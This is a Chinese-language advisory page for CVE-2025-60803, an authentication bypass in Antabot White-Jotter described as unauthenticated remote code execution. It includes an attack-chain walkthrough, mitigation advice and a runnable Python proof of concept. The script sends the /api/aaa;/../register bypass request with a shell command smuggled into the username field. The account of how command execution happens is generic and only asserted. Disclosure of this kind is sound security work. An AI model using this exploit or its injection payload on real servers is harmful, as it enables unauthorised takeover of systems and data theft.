CVE-2025-60803 Antabot White-Jotter 未授权远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-60803

漏洞类型

远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Antabot White-Jotter

漏洞概述

CVE-2025-60803是Antabot White-Jotter应用中的一个严重安全漏洞，CVSS评分高达9.8，属于紧急严重级别。该漏洞存在于White-Jotter的API路由处理机制中，攻击者可以通过构造特殊的URL路径 /api/aaa;/../register 来绕过身份验证机制，直接访问本应需要认证的注册接口。由于该接口缺乏足够的输入验证和权限控制，攻击者可以执行任意代码，实现对服务器的完全控制。此漏洞影响版本至commit 9bcadc，由于攻击复杂度低且无需用户交互，远程攻击者可在短时间内完成漏洞利用，对使用该框架的Web应用造成严重安全威胁。建议受影响的用户立即升级到最新版本或应用官方发布的安全补丁。

技术细节

该漏洞的根本原因在于White-Jotter框架的路由匹配机制存在路径遍历和认证绕过问题。当攻击者发送请求到 /api/aaa;/../register 时，服务器端解析路径时会将 ; 作为分隔符，将请求路径拆分为 /api/aaa 和 /../register 两部分。路由处理器在验证请求路径时未能正确处理这种特殊字符，导致路径解析器错误地跳过了认证检查，直接放行请求到注册处理器。注册接口在处理用户输入时，直接将参数传递给后端数据库或执行环境，缺少预编译语句和输入过滤机制。攻击者可以在注册请求中注入系统命令或恶意代码片段，由于应用以高权限运行，注入的代码将获得服务器执行权限。成功利用此漏洞后，攻击者可以在服务器上执行任意命令，包括读取敏感配置文件、植入后门程序或建立持久化访问通道。

攻击链分析

STEP 1

步骤1

攻击者发现目标站点使用Antabot White-Jotter框架，通过信息收集确认版本在commit 9bcadc之前

STEP 2

步骤2

攻击者构造恶意URL请求 /api/aaa;/../register，利用路径遍历和认证绕过技巧

STEP 3

步骤3

服务器路由解析器错误处理分号分隔符，跳过正常的身份验证检查

STEP 4

步骤4

请求绕过认证到达注册处理器，攻击者在用户注册参数中注入系统命令

STEP 5

步骤5

注入的恶意代码以服务器高权限执行，攻击者获得系统完全控制权

STEP 6

步骤6

攻击者建立持久化后门，窃取敏感数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 # CVE-2025-60803 PoC - Antabot White-Jotter Unauthenticated RCE # Educational purpose only - Do not use without authorization import requests import sys def exploit_cve_2025_60803(target_url, command): """ Exploit the path traversal authentication bypass in White-Jotter Target endpoint: /api/aaa;/../register """ target = target_url.rstrip('/') # Construct malicious URL with path traversal exploit_url = f"{target}/api/aaa;/../register" # Payload for remote code execution # Inject command into username or email field payload = { 'username': f"test;{command};", 'password': 'Password123!', 'email': '[email protected]' } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.post(exploit_url, json=payload, headers=headers, timeout=10) print(f"[*] Request sent to: {exploit_url}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == '__main__': if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <command>") print(f"Example: {sys.argv[0]} http://target.com 'whoami'") sys.exit(1) target_url = sys.argv[1] command = sys.argv[2] exploit_cve_2025_60803(target_url, command)

影响范围

Antabot White-Jotter <= 9bcadc

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，拦截包含分号和路径遍历字符的请求；2) 对 /api/* 路径下的所有端点强制实施身份验证；3) 限制注册接口的访问频率和IP来源；4) 监控异常请求模式，及时发现潜在攻击行为；5) 考虑暂时禁用或限制公开注册功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60803
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60803
3 Details https://www.cvedetails.com/cve/CVE-2025-60803/
4 VulDB https://vuldb.com/cve/CVE-2025-60803
5 Link https://github.com/Antabot/White-Jotter/issues/162